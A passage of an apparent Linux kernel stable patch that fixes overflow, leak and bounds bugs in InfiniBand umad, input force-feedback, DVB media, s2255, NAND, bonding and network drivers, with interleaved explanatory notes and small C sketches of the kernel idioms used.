+ 	mutex_unlock(&file->mutex);
+ 
+ 	return ret;
+@@ -224,7 +231,7 @@ static void send_handler(struct ib_mad_agent *agent,
+ 	if (send_wc->status == IB_WC_RESP_TIMEOUT_ERR) {
+ 		packet->length = IB_MGMT_MAD_HDR;
+ 		packet->mad.hdr.status = ETIMEDOUT;
+-		if (!queue_packet(file, agent, packet))
++		if (!queue_packet(file, agent, packet, false))
+ 			return;
+ 	}
+ 	kfree(packet);
+@@ -284,7 +291,7 @@ static void recv_handler(struct ib_mad_agent *agent,
+ 		rdma_destroy_ah_attr(&ah_attr);
+ 	}
+ 
+-	if (queue_packet(file, agent, packet))
++	if (queue_packet(file, agent, packet, true))
+ 		goto err2;
+ 	return;
+ 
+@@ -409,6 +416,7 @@ static ssize_t ib_umad_read(struct file *filp, char __user *buf,
+ 
+ 	packet = list_entry(file->recv_list.next, struct ib_umad_packet, list);
+ 	list_del(&packet->list);
++	atomic_dec(&file->recv_list_size);
+ 
+ 	mutex_unlock(&file->mutex);
+ 
+@@ -421,6 +429,7 @@ static ssize_t ib_umad_read(struct file *filp, char __user *buf,
+ 		/* Requeue packet */
+ 		mutex_lock(&file->mutex);
+ 		list_add(&packet->list, &file->recv_list);
++		atomic_inc(&file->recv_list_size);
+ 		mutex_unlock(&file->mutex);
+ 	} else {
+ 		if (packet->recv_wc)
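
MAX_UMAD_RECV_LIST_SIZE caps a queue that an unresponsive reader could otherwise grow without bound. A generic sketch of the idiom; the counter is updated under the same mutex as the list, so the atomic type buys a cheap read, not lock-free updates:

#include <linux/atomic.h>
#include <linux/list.h>
#include <linux/mutex.h>

#define MAX_QUEUED 200000

/* Sketch: refuse to enqueue once the backlog exceeds the cap. */
static bool try_enqueue(struct list_head *q, struct list_head *item,
			atomic_t *size, struct mutex *lock)
{
	bool queued = false;

	mutex_lock(lock);
	if (atomic_read(size) <= MAX_QUEUED) {
		list_add_tail(item, q);
		atomic_inc(size);
		queued = true;
	}
	mutex_unlock(lock);
	return queued;
}
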
+diff --git a/drivers/input/ff-core.c b/drivers/input/ff-core.c
+index 16231fe080b00..609a5f01761bd 100644
+--- a/drivers/input/ff-core.c
++++ b/drivers/input/ff-core.c
+@@ -9,8 +9,10 @@
+ /* #define DEBUG */
+ 
+ #include <linux/input.h>
++#include <linux/limits.h>
+ #include <linux/module.h>
+ #include <linux/mutex.h>
++#include <linux/overflow.h>
+ #include <linux/sched.h>
+ #include <linux/slab.h>
+ 
+@@ -315,9 +317,8 @@ int input_ff_create(struct input_dev *dev, unsigned int max_effects)
+ 		return -EINVAL;
+ 	}
+ 
+-	ff_dev_size = sizeof(struct ff_device) +
+-				max_effects * sizeof(struct file *);
+-	if (ff_dev_size < max_effects) /* overflow */
++	ff_dev_size = struct_size(ff, effect_owners, max_effects);
++	if (ff_dev_size == SIZE_MAX) /* overflow */
+ 		return -EINVAL;
+ 
+ 	ff = kzalloc(ff_dev_size, GFP_KERNEL);
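
struct_size() computes sizeof(*p) plus count times the element size and saturates to SIZE_MAX on overflow, so a single equality test replaces the old open-coded comparison, which was a fragile overflow heuristic. A sketch with a hypothetical stand-in type:

#include <linux/limits.h>
#include <linux/overflow.h>
#include <linux/slab.h>

struct ff_like {			/* hypothetical stand-in */
	unsigned int max_effects;
	struct file *effect_owners[];	/* flexible array member */
};

/* Sketch: struct_size() only inspects types, so using the pointer
 * before allocation is fine, as in the fix above.
 */
static struct ff_like *ff_alloc(unsigned int n)
{
	struct ff_like *ff;
	size_t size = struct_size(ff, effect_owners, n);

	if (size == SIZE_MAX)	/* saturated: n was too large */
		return NULL;

	ff = kzalloc(size, GFP_KERNEL);
	if (ff)
		ff->max_effects = n;
	return ff;
}
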
+diff --git a/drivers/media/dvb-frontends/as102_fe_types.h b/drivers/media/dvb-frontends/as102_fe_types.h
+index 297f9520ebf9d..8a4e392c88965 100644
+--- a/drivers/media/dvb-frontends/as102_fe_types.h
++++ b/drivers/media/dvb-frontends/as102_fe_types.h
+@@ -174,6 +174,6 @@ struct as10x_register_addr {
+ 	uint32_t addr;
+ 	/* register mode access */
+ 	uint8_t mode;
+-};
++} __packed;
+ 
+ #endif
+diff --git a/drivers/media/dvb-frontends/tda10048.c b/drivers/media/dvb-frontends/tda10048.c
+index f6d8a64762b99..907e786c5e10b 100644
+--- a/drivers/media/dvb-frontends/tda10048.c
++++ b/drivers/media/dvb-frontends/tda10048.c
+@@ -410,6 +410,7 @@ static int tda10048_set_if(struct dvb_frontend *fe, u32 bw)
+ 	struct tda10048_config *config = &state->config;
+ 	int i;
+ 	u32 if_freq_khz;
++	u64 sample_freq;
+ 
+ 	dprintk(1, "%s(bw = %d)\n", __func__, bw);
+ 
+@@ -451,9 +452,11 @@ static int tda10048_set_if(struct dvb_frontend *fe, u32 bw)
+ 	dprintk(1, "- pll_pfactor = %d\n", state->pll_pfactor);
+ 
+ 	/* Calculate the sample frequency */
+-	state->sample_freq = state->xtal_hz * (state->pll_mfactor + 45);
+-	state->sample_freq /= (state->pll_nfactor + 1);
+-	state->sample_freq /= (state->pll_pfactor + 4);
++	sample_freq = state->xtal_hz;
++	sample_freq *= state->pll_mfactor + 45;
++	do_div(sample_freq, state->pll_nfactor + 1);
++	do_div(sample_freq, state->pll_pfactor + 4);
++	state->sample_freq = sample_freq;
+ 	dprintk(1, "- sample_freq = %d\n", state->sample_freq);
+ 
+ 	/* Update the I/F */
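
The tda10048 math overflowed because it accumulated in 32 bits; the fix widens to u64 and uses do_div(), which divides a u64 in place by a 32-bit divisor and works on 32-bit architectures where a plain 64-bit division would not link. A sketch of the widened arithmetic:

#include <linux/types.h>
#include <asm/div64.h>

/* Sketch mirroring the PLL math above: multiply in u64, then divide
 * in place with do_div().
 */
static u32 sample_freq_hz(u32 xtal_hz, u32 m, u32 n, u32 p)
{
	u64 f = (u64)xtal_hz * (m + 45);

	do_div(f, n + 1);
	do_div(f, p + 4);
	return (u32)f;
}
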
+diff --git a/drivers/media/dvb-frontends/tda18271c2dd.c b/drivers/media/dvb-frontends/tda18271c2dd.c
+index a348344879433..fd928787207ed 100644
+--- a/drivers/media/dvb-frontends/tda18271c2dd.c
++++ b/drivers/media/dvb-frontends/tda18271c2dd.c
+@@ -328,7 +328,7 @@ static int CalcMainPLL(struct tda_state *state, u32 freq)
+ 
+ 	OscFreq = (u64) freq * (u64) Div;
+ 	OscFreq *= (u64) 16384;
+-	do_div(OscFreq, (u64)16000000);
++	do_div(OscFreq, 16000000);
+ 	MainDiv = OscFreq;
+ 
+ 	state->m_Regs[MPD] = PostDiv & 0x77;
+@@ -352,7 +352,7 @@ static int CalcCalPLL(struct tda_state *state, u32 freq)
+ 	OscFreq = (u64)freq * (u64)Div;
+ 	/* CalDiv = u32( OscFreq * 16384 / 16000000 ); */
+ 	OscFreq *= (u64)16384;
+-	do_div(OscFreq, (u64)16000000);
++	do_div(OscFreq, 16000000);
+ 	CalDiv = OscFreq;
+ 
+ 	state->m_Regs[CPD] = PostDiv;
+diff --git a/drivers/media/usb/dvb-usb/dib0700_devices.c b/drivers/media/usb/dvb-usb/dib0700_devices.c
+index 7f8bebfa3e8e9..3d14aba7a0dea 100644
+--- a/drivers/media/usb/dvb-usb/dib0700_devices.c
++++ b/drivers/media/usb/dvb-usb/dib0700_devices.c
+@@ -2419,7 +2419,12 @@ static int stk9090m_frontend_attach(struct dvb_usb_adapter *adap)
+ 
+ 	adap->fe_adap[0].fe = dvb_attach(dib9000_attach, &adap->dev->i2c_adap, 0x80, &stk9090m_config);
+ 
+-	return adap->fe_adap[0].fe == NULL ?  -ENODEV : 0;
++	if (!adap->fe_adap[0].fe) {
++		release_firmware(state->frontend_firmware);
++		return -ENODEV;
++	}
++
++	return 0;
+ }
+ 
+ static int dib9090_tuner_attach(struct dvb_usb_adapter *adap)
+@@ -2492,8 +2497,10 @@ static int nim9090md_frontend_attach(struct dvb_usb_adapter *adap)
+ 	dib9000_i2c_enumeration(&adap->dev->i2c_adap, 1, 0x20, 0x80);
+ 	adap->fe_adap[0].fe = dvb_attach(dib9000_attach, &adap->dev->i2c_adap, 0x80, &nim9090md_config[0]);
+ 
+-	if (adap->fe_adap[0].fe == NULL)
++	if (!adap->fe_adap[0].fe) {
++		release_firmware(state->frontend_firmware);
+ 		return -ENODEV;
++	}
+ 
+ 	i2c = dib9000_get_i2c_master(adap->fe_adap[0].fe, DIBX000_I2C_INTERFACE_GPIO_3_4, 0);
+ 	dib9000_i2c_enumeration(i2c, 1, 0x12, 0x82);
+@@ -2501,7 +2508,12 @@ static int nim9090md_frontend_attach(struct dvb_usb_adapter *adap)
+ 	fe_slave = dvb_attach(dib9000_attach, i2c, 0x82, &nim9090md_config[1]);
+ 	dib9000_set_slave_frontend(adap->fe_adap[0].fe, fe_slave);
+ 
+-	return fe_slave == NULL ?  -ENODEV : 0;
++	if (!fe_slave) {
++		release_firmware(state->frontend_firmware);
++		return -ENODEV;
++	}
++
++	return 0;
+ }
+ 
+ static int nim9090md_tuner_attach(struct dvb_usb_adapter *adap)
+diff --git a/drivers/media/usb/dvb-usb/dw2102.c b/drivers/media/usb/dvb-usb/dw2102.c
+index 356fc728d59a8..5ff08dd04b5b3 100644
+--- a/drivers/media/usb/dvb-usb/dw2102.c
++++ b/drivers/media/usb/dvb-usb/dw2102.c
+@@ -716,6 +716,7 @@ static int su3000_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ {
+ 	struct dvb_usb_device *d = i2c_get_adapdata(adap);
+ 	struct dw2102_state *state;
++	int j;
+ 
+ 	if (!d)
+ 		return -ENODEV;
+@@ -729,11 +730,11 @@ static int su3000_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 		return -EAGAIN;
+ 	}
+ 
+-	switch (num) {
+-	case 1:
+-		switch (msg[0].addr) {
++	j = 0;
++	while (j < num) {
++		switch (msg[j].addr) {
+ 		case SU3000_STREAM_CTRL:
+-			state->data[0] = msg[0].buf[0] + 0x36;
++			state->data[0] = msg[j].buf[0] + 0x36;
+ 			state->data[1] = 3;
+ 			state->data[2] = 0;
+ 			if (dvb_usb_generic_rw(d, state->data, 3,
+@@ -745,61 +746,86 @@ static int su3000_i2c_transfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			if (dvb_usb_generic_rw(d, state->data, 1,
+ 					state->data, 2, 0) < 0)
+ 				err("i2c transfer failed.");
+-			msg[0].buf[1] = state->data[0];
+-			msg[0].buf[0] = state->data[1];
++			msg[j].buf[1] = state->data[0];
++			msg[j].buf[0] = state->data[1];
+ 			break;
+ 		default:
+-			if (3 + msg[0].len > sizeof(state->data)) {
+-				warn("i2c wr: len=%d is too big!\n",
+-				     msg[0].len);
++			/* if the current write msg is followed by another
++			 * read msg to/from the same address
++			 */
++			if ((j+1 < num) && (msg[j+1].flags & I2C_M_RD) &&
++			    (msg[j].addr == msg[j+1].addr)) {
++				/* join both i2c msgs to one usb read command */
++				if (4 + msg[j].len > sizeof(state->data)) {
++					warn("i2c combined wr/rd: write len=%d is too big!\n",
++					    msg[j].len);
++					num = -EOPNOTSUPP;
++					break;
++				}
++				if (1 + msg[j+1].len > sizeof(state->data)) {
++					warn("i2c combined wr/rd: read len=%d is too big!\n",
++					    msg[j+1].len);
++					num = -EOPNOTSUPP;
++					break;
++				}
++
++				state->data[0] = 0x09;
++				state->data[1] = msg[j].len;
++				state->data[2] = msg[j+1].len;
++				state->data[3] = msg[j].addr;
++				memcpy(&state->data[4], msg[j].buf, msg[j].len);
++
++				if (dvb_usb_generic_rw(d, state->data, msg[j].len + 4,
++					state->data, msg[j+1].len + 1, 0) < 0)
++					err("i2c transfer failed.");
++
++				memcpy(msg[j+1].buf, &state->data[1], msg[j+1].len);
++				j++;
++				break;
++			}
++
++			if (msg[j].flags & I2C_M_RD) {
++				/* single read */
++				if (4 + msg[j].len > sizeof(state->data)) {
++					warn("i2c rd: len=%d is too big!\n", msg[j].len);
++					num = -EOPNOTSUPP;
++					break;
++				}
++
++				state->data[0] = 0x09;
++				state->data[1] = 0;
++				state->data[2] = msg[j].len;
++				state->data[3] = msg[j].addr;
++				memcpy(&state->data[4], msg[j].buf, msg[j].len);
++
++				if (dvb_usb_generic_rw(d, state->data, 4,
++					state->data, msg[j].len + 1, 0) < 0)
++					err("i2c transfer failed.");
++
++				memcpy(msg[j].buf, &state->data[1], msg[j].len);
++				break;
++			}
++
++			/* single write */
++			if (3 + msg[j].len > sizeof(state->data)) {
++				warn("i2c wr: len=%d is too big!\n", msg[j].len);
+ 				num = -EOPNOTSUPP;
+ 				break;
+ 			}
+ 
+-			/* always i2c write*/
+ 			state->data[0] = 0x08;
+-			state->data[1] = msg[0].addr;
+-			state->data[2] = msg[0].len;
++			state->data[1] = msg[j].addr;
++			state->data[2] = msg[j].len;
+ 
+-			memcpy(&state->data[3], msg[0].buf, msg[0].len);
++			memcpy(&state->data[3], msg[j].buf, msg[j].len);
+ 
+-			if (dvb_usb_generic_rw(d, state->data, msg[0].len + 3,
++			if (dvb_usb_generic_rw(d, state->data, msg[j].len + 3,
+ 						state->data, 1, 0) < 0)
+ 				err("i2c transfer failed.");
++		} // switch
++		j++;
+ 
+-		}
+-		break;
+-	case 2:
+-		/* always i2c read */
+-		if (4 + msg[0].len > sizeof(state->data)) {
+-			warn("i2c rd: len=%d is too big!\n",
+-			     msg[0].len);
+-			num = -EOPNOTSUPP;
+-			break;
+-		}
+-		if (1 + msg[1].len > sizeof(state->data)) {
+-			warn("i2c rd: len=%d is too big!\n",
+-			     msg[1].len);
+-			num = -EOPNOTSUPP;
+-			break;
+-		}
+-
+-		state->data[0] = 0x09;
+-		state->data[1] = msg[0].len;
+-		state->data[2] = msg[1].len;
+-		state->data[3] = msg[0].addr;
+-		memcpy(&state->data[4], msg[0].buf, msg[0].len);
+-
+-		if (dvb_usb_generic_rw(d, state->data, msg[0].len + 4,
+-					state->data, msg[1].len + 1, 0) < 0)
+-			err("i2c transfer failed.");
+-
+-		memcpy(msg[1].buf, &state->data[1], msg[1].len);
+-		break;
+-	default:
+-		warn("more than 2 i2c messages at a time is not handled yet.");
+-		break;
+-	}
++	} // while
+ 	mutex_unlock(&d->data_mutex);
+ 	mutex_unlock(&d->i2c_mutex);
+ 	return num;
+diff --git a/drivers/media/usb/s2255/s2255drv.c b/drivers/media/usb/s2255/s2255drv.c
+index acf18e2251a52..6c9870541c53d 100644
+--- a/drivers/media/usb/s2255/s2255drv.c
++++ b/drivers/media/usb/s2255/s2255drv.c
+@@ -247,7 +247,7 @@ struct s2255_vc {
+ struct s2255_dev {
+ 	struct s2255_vc         vc[MAX_CHANNELS];
+ 	struct v4l2_device      v4l2_dev;
+-	atomic_t                num_channels;
++	refcount_t		num_channels;
+ 	int			frames;
+ 	struct mutex		lock;	/* channels[].vdev.lock */
+ 	struct mutex		cmdlock; /* protects cmdbuf */
+@@ -1550,11 +1550,11 @@ static void s2255_video_device_release(struct video_device *vdev)
+ 		container_of(vdev, struct s2255_vc, vdev);
+ 
+ 	dprintk(dev, 4, "%s, chnls: %d\n", __func__,
+-		atomic_read(&dev->num_channels));
++		refcount_read(&dev->num_channels));
+ 
+ 	v4l2_ctrl_handler_free(&vc->hdl);
+ 
+-	if (atomic_dec_and_test(&dev->num_channels))
++	if (refcount_dec_and_test(&dev->num_channels))
+ 		s2255_destroy(dev);
+ 	return;
+ }
+@@ -1659,7 +1659,7 @@ static int s2255_probe_v4l(struct s2255_dev *dev)
+ 				"failed to register video device!\n");
+ 			break;
+ 		}
+-		atomic_inc(&dev->num_channels);
++		refcount_inc(&dev->num_channels);
+ 		v4l2_info(&dev->v4l2_dev, "V4L2 device registered as %s\n",
+ 			  video_device_node_name(&vc->vdev));
+ 
+@@ -1667,11 +1667,11 @@ static int s2255_probe_v4l(struct s2255_dev *dev)
+ 	pr_info("Sensoray 2255 V4L driver Revision: %s\n",
+ 		S2255_VERSION);
+ 	/* if no channels registered, return error and probe will fail*/
+-	if (atomic_read(&dev->num_channels) == 0) {
++	if (refcount_read(&dev->num_channels) == 0) {
+ 		v4l2_device_unregister(&dev->v4l2_dev);
+ 		return ret;
+ 	}
+-	if (atomic_read(&dev->num_channels) != MAX_CHANNELS)
++	if (refcount_read(&dev->num_channels) != MAX_CHANNELS)
+ 		pr_warn("s2255: Not all channels available.\n");
+ 	return 0;
+ }
+@@ -2220,7 +2220,7 @@ static int s2255_probe(struct usb_interface *interface,
+ 		goto errorFWDATA1;
+ 	}
+ 
+-	atomic_set(&dev->num_channels, 0);
++	refcount_set(&dev->num_channels, 0);
+ 	dev->pid = id->idProduct;
+ 	dev->fw_data = kzalloc(sizeof(struct s2255_fw), GFP_KERNEL);
+ 	if (!dev->fw_data)
+@@ -2340,12 +2340,12 @@ static void s2255_disconnect(struct usb_interface *interface)
+ {
+ 	struct s2255_dev *dev = to_s2255_dev(usb_get_intfdata(interface));
+ 	int i;
+-	int channels = atomic_read(&dev->num_channels);
++	int channels = refcount_read(&dev->num_channels);
+ 	mutex_lock(&dev->lock);
+ 	v4l2_device_disconnect(&dev->v4l2_dev);
+ 	mutex_unlock(&dev->lock);
+ 	/*see comments in the uvc_driver.c usb disconnect function */
+-	atomic_inc(&dev->num_channels);
++	refcount_inc(&dev->num_channels);
+ 	/* unregister each video device. */
+ 	for (i = 0; i < channels; i++)
+ 		video_unregister_device(&dev->vc[i].vdev);
+@@ -2358,7 +2358,7 @@ static void s2255_disconnect(struct usb_interface *interface)
+ 		dev->vc[i].vidstatus_ready = 1;
+ 		wake_up(&dev->vc[i].wait_vidstatus);
+ 	}
+-	if (atomic_dec_and_test(&dev->num_channels))
++	if (refcount_dec_and_test(&dev->num_channels))
+ 		s2255_destroy(dev);
+ 	dev_info(&interface->dev, "%s\n", __func__);
+ }
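
s2255 moves its channel count from atomic_t to refcount_t, which saturates and WARNs on overflow and underflow instead of silently wrapping. The canonical lifetime pattern, as a sketch:

#include <linux/refcount.h>
#include <linux/slab.h>

struct obj {
	refcount_t users;
	/* ... payload ... */
};

/* Sketch: start at 1 for the creator, take a reference per user, and
 * destroy on the last put, as s2255_destroy() is invoked above.
 */
static struct obj *obj_new(void)
{
	struct obj *o = kzalloc(sizeof(*o), GFP_KERNEL);

	if (o)
		refcount_set(&o->users, 1);
	return o;
}

static void obj_put(struct obj *o)
{
	if (refcount_dec_and_test(&o->users))
		kfree(o);
}
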
+diff --git a/drivers/mtd/nand/raw/nand_base.c b/drivers/mtd/nand/raw/nand_base.c
+index c3cc660399255..ea7e37a6e4c07 100644
+--- a/drivers/mtd/nand/raw/nand_base.c
++++ b/drivers/mtd/nand/raw/nand_base.c
+@@ -1090,28 +1090,32 @@ static int nand_fill_column_cycles(struct nand_chip *chip, u8 *addrs,
+ 				   unsigned int offset_in_page)
+ {
+ 	struct mtd_info *mtd = nand_to_mtd(chip);
++	bool ident_stage = !mtd->writesize;
+ 
+-	/* Make sure the offset is less than the actual page size. */
+-	if (offset_in_page > mtd->writesize + mtd->oobsize)
+-		return -EINVAL;
++	/* Bypass all checks during NAND identification */
++	if (likely(!ident_stage)) {
++		/* Make sure the offset is less than the actual page size. */
++		if (offset_in_page > mtd->writesize + mtd->oobsize)
++			return -EINVAL;
+ 
+-	/*
+-	 * On small page NANDs, there's a dedicated command to access the OOB
+-	 * area, and the column address is relative to the start of the OOB
+-	 * area, not the start of the page. Asjust the address accordingly.
+-	 */
+-	if (mtd->writesize <= 512 && offset_in_page >= mtd->writesize)
+-		offset_in_page -= mtd->writesize;
++		/*
++		 * On small page NANDs, there's a dedicated command to access the OOB
++		 * area, and the column address is relative to the start of the OOB
++		 * area, not the start of the page. Adjust the address accordingly.
++		 */
++		if (mtd->writesize <= 512 && offset_in_page >= mtd->writesize)
++			offset_in_page -= mtd->writesize;
+ 
+-	/*
+-	 * The offset in page is expressed in bytes, if the NAND bus is 16-bit
+-	 * wide, then it must be divided by 2.
+-	 */
+-	if (chip->options & NAND_BUSWIDTH_16) {
+-		if (WARN_ON(offset_in_page % 2))
+-			return -EINVAL;
++		/*
++		 * The offset in page is expressed in bytes, if the NAND bus is 16-bit
++		 * wide, then it must be divided by 2.
++		 */
++		if (chip->options & NAND_BUSWIDTH_16) {
++			if (WARN_ON(offset_in_page % 2))
++				return -EINVAL;
+ 
+-		offset_in_page /= 2;
++			offset_in_page /= 2;
++		}
+ 	}
+ 
+ 	addrs[0] = offset_in_page;
+@@ -1120,7 +1124,7 @@ static int nand_fill_column_cycles(struct nand_chip *chip, u8 *addrs,
+ 	 * Small page NANDs use 1 cycle for the columns, while large page NANDs
+ 	 * need 2
+ 	 */
+-	if (mtd->writesize <= 512)
++	if (!ident_stage && mtd->writesize <= 512)
+ 		return 1;
+ 
+ 	addrs[1] = offset_in_page >> 8;
+@@ -1316,16 +1320,19 @@ int nand_change_read_column_op(struct nand_chip *chip,
+ 			       unsigned int len, bool force_8bit)
+ {
+ 	struct mtd_info *mtd = nand_to_mtd(chip);
++	bool ident_stage = !mtd->writesize;
+ 
+ 	if (len && !buf)
+ 		return -EINVAL;
+ 
+-	if (offset_in_page + len > mtd->writesize + mtd->oobsize)
+-		return -EINVAL;
++	if (!ident_stage) {
++		if (offset_in_page + len > mtd->writesize + mtd->oobsize)
++			return -EINVAL;
+ 
+-	/* Small page NANDs do not support column change. */
+-	if (mtd->writesize <= 512)
+-		return -ENOTSUPP;
++		/* Small page NANDs do not support column change. */
++		if (mtd->writesize <= 512)
++			return -ENOTSUPP;
++	}
+ 
+ 	if (nand_has_exec_op(chip)) {
+ 		const struct nand_interface_config *conf =
+@@ -6062,6 +6069,7 @@ static const struct nand_ops rawnand_ops = {
+ static int nand_scan_tail(struct nand_chip *chip)
+ {
+ 	struct mtd_info *mtd = nand_to_mtd(chip);
++	struct nand_device *base = &chip->base;
+ 	struct nand_ecc_ctrl *ecc = &chip->ecc;
+ 	int ret, i;
+ 
+@@ -6206,9 +6214,13 @@ static int nand_scan_tail(struct nand_chip *chip)
+ 	if (!ecc->write_oob_raw)
+ 		ecc->write_oob_raw = ecc->write_oob;
+ 
+-	/* propagate ecc info to mtd_info */
++	/* Propagate ECC info to the generic NAND and MTD layers */
+ 	mtd->ecc_strength = ecc->strength;
++	if (!base->ecc.ctx.conf.strength)
++		base->ecc.ctx.conf.strength = ecc->strength;
+ 	mtd->ecc_step_size = ecc->size;
++	if (!base->ecc.ctx.conf.step_size)
++		base->ecc.ctx.conf.step_size = ecc->size;
+ 
+ 	/*
+ 	 * Set the number of read / write steps for one page depending on ECC
+@@ -6216,6 +6228,8 @@ static int nand_scan_tail(struct nand_chip *chip)
+ 	 */
+ 	if (!ecc->steps)
+ 		ecc->steps = mtd->writesize / ecc->size;
++	if (!base->ecc.ctx.nsteps)
++		base->ecc.ctx.nsteps = ecc->steps;
+ 	if (ecc->steps * ecc->size != mtd->writesize) {
+ 		WARN(1, "Invalid ECC parameters\n");
+ 		ret = -EINVAL;
+diff --git a/drivers/mtd/nand/raw/rockchip-nand-controller.c b/drivers/mtd/nand/raw/rockchip-nand-controller.c
+index c9c4e9ffcae18..d8456b849c13d 100644
+--- a/drivers/mtd/nand/raw/rockchip-nand-controller.c
++++ b/drivers/mtd/nand/raw/rockchip-nand-controller.c
+@@ -421,13 +421,13 @@ static int rk_nfc_setup_interface(struct nand_chip *chip, int target,
+ 	u32 rate, tc2rw, trwpw, trw2c;
+ 	u32 temp;
+ 
+-	if (target < 0)
+-		return 0;
+-
+ 	timings = nand_get_sdr_timings(conf);
+ 	if (IS_ERR(timings))
+ 		return -EOPNOTSUPP;
+ 
++	if (target < 0)
++		return 0;
++
+ 	if (IS_ERR(nfc->nfc_clk))
+ 		rate = clk_get_rate(nfc->ahb_clk);
+ 	else
+diff --git a/drivers/net/bonding/bond_options.c b/drivers/net/bonding/bond_options.c
+index 5bb2c098bf4df..685fb4703ee1f 100644
+--- a/drivers/net/bonding/bond_options.c
++++ b/drivers/net/bonding/bond_options.c
+@@ -1210,9 +1210,9 @@ static int bond_option_arp_ip_targets_set(struct bonding *bond,
+ 	__be32 target;
+ 
+ 	if (newval->string) {
+-		if (!in4_pton(newval->string+1, -1, (u8 *)&target, -1, NULL)) {
+-			netdev_err(bond->dev, "invalid ARP target %pI4 specified\n",
+-				   &target);
++		if (strlen(newval->string) < 1 ||
++		    !in4_pton(newval->string + 1, -1, (u8 *)&target, -1, NULL)) {
++			netdev_err(bond->dev, "invalid ARP target specified\n");
+ 			return ret;
+ 		}
+ 		if (newval->string[0] == '+')
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
+index 3a2bfaad14065..5136d1e161181 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
+@@ -124,6 +124,7 @@ static const struct kvaser_usb_driver_info kvaser_usb_driver_info_leaf_err_liste
+ 
+ static const struct kvaser_usb_driver_info kvaser_usb_driver_info_leafimx = {
+ 	.quirks = 0,
++	.family = KVASER_LEAF,
+ 	.ops = &kvaser_usb_leaf_dev_ops,
+ };
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index dc4ff8a6d0bf5..4938550a67c02 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -131,8 +131,8 @@ struct mii_bus *mv88e6xxx_default_mdio_bus(struct mv88e6xxx_chip *chip)
+ {
+ 	struct mv88e6xxx_mdio_bus *mdio_bus;
+ 
+-	mdio_bus = list_first_entry(&chip->mdios, struct mv88e6xxx_mdio_bus,
+-				    list);
++	mdio_bus = list_first_entry_or_null(&chip->mdios,
++					    struct mv88e6xxx_mdio_bus, list);
+ 	if (!mdio_bus)
+ 		return NULL;
+ 
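
On an empty list, list_first_entry() does not return NULL; it returns the head itself disguised as an element, so the NULL check that follows it above could never fire. list_first_entry_or_null() is the checkable form. A sketch with a hypothetical element type:

#include <linux/list.h>

struct bus_entry {		/* hypothetical element type */
	struct list_head list;
};

/* Sketch: returns NULL when the list is empty, a real entry otherwise. */
static struct bus_entry *first_or_null(struct list_head *head)
{
	return list_first_entry_or_null(head, struct bus_entry, list);
}
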
+diff --git a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
+index dd5945c4bfec2..375ad57fca9b4 100644
+--- a/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
++++ b/drivers/net/ethernet/broadcom/bnx2x/bnx2x.h
+@@ -1262,7 +1262,7 @@ enum {
+ 
+ struct bnx2x_fw_stats_req {
+ 	struct stats_query_header hdr;
+-	struct stats_query_entry query[FP_SB_MAX_E1x+
++	struct stats_query_entry query[FP_SB_MAX_E2 +
+ 		BNX2X_FIRST_QUEUE_QUERY_IDX];
+ };
+ 
+diff --git a/drivers/net/ethernet/intel/e1000e/netdev.c b/drivers/net/ethernet/intel/e1000e/netdev.c
+index db8e06157da29..cbd8357c61edc 100644
+--- a/drivers/net/ethernet/intel/e1000e/netdev.c
++++ b/drivers/net/ethernet/intel/e1000e/netdev.c
+@@ -6369,49 +6369,49 @@ static void e1000e_s0ix_entry_flow(struct e1000_adapter *adapter)
+ 		mac_data |= E1000_EXTCNF_CTRL_GATE_PHY_CFG;
+ 		ew32(EXTCNF_CTRL, mac_data);
+ 
+-		/* Enable the Dynamic Power Gating in the MAC */
+-		mac_data = er32(FEXTNVM7);
+-		mac_data |= BIT(22);
+-		ew32(FEXTNVM7, mac_data);
+-
+ 		/* Disable disconnected cable conditioning for Power Gating */
+ 		mac_data = er32(DPGFR);
+ 		mac_data |= BIT(2);
+ 		ew32(DPGFR, mac_data);
+ 
+-		/* Don't wake from dynamic Power Gating with clock request */
+-		mac_data = er32(FEXTNVM12);
+-		mac_data |= BIT(12);
+-		ew32(FEXTNVM12, mac_data);
+-
+-		/* Ungate PGCB clock */
+-		mac_data = er32(FEXTNVM9);
+-		mac_data &= ~BIT(28);
+-		ew32(FEXTNVM9, mac_data);
+-
+-		/* Enable K1 off to enable mPHY Power Gating */
+-		mac_data = er32(FEXTNVM6);
+-		mac_data |= BIT(31);
+-		ew32(FEXTNVM6, mac_data);
+-
+-		/* Enable mPHY power gating for any link and speed */
+-		mac_data = er32(FEXTNVM8);
+-		mac_data |= BIT(9);
+-		ew32(FEXTNVM8, mac_data);
+-
+ 		/* Enable the Dynamic Clock Gating in the DMA and MAC */
+ 		mac_data = er32(CTRL_EXT);
+ 		mac_data |= E1000_CTRL_EXT_DMA_DYN_CLK_EN;
+ 		ew32(CTRL_EXT, mac_data);
+-
+-		/* No MAC DPG gating SLP_S0 in modern standby
+-		 * Switch the logic of the lanphypc to use PMC counter
+-		 */
+-		mac_data = er32(FEXTNVM5);
+-		mac_data |= BIT(7);
+-		ew32(FEXTNVM5, mac_data);
+ 	}
+ 
++	/* Enable the Dynamic Power Gating in the MAC */
++	mac_data = er32(FEXTNVM7);
++	mac_data |= BIT(22);
++	ew32(FEXTNVM7, mac_data);
++
++	/* Don't wake from dynamic Power Gating with clock request */
++	mac_data = er32(FEXTNVM12);
++	mac_data |= BIT(12);
++	ew32(FEXTNVM12, mac_data);
++
++	/* Ungate PGCB clock */
++	mac_data = er32(FEXTNVM9);
++	mac_data &= ~BIT(28);
++	ew32(FEXTNVM9, mac_data);
++
++	/* Enable K1 off to enable mPHY Power Gating */
++	mac_data = er32(FEXTNVM6);
++	mac_data |= BIT(31);
++	ew32(FEXTNVM6, mac_data);
++
++	/* Enable mPHY power gating for any link and speed */
++	mac_data = er32(FEXTNVM8);
++	mac_data |= BIT(9);
++	ew32(FEXTNVM8, mac_data);
++
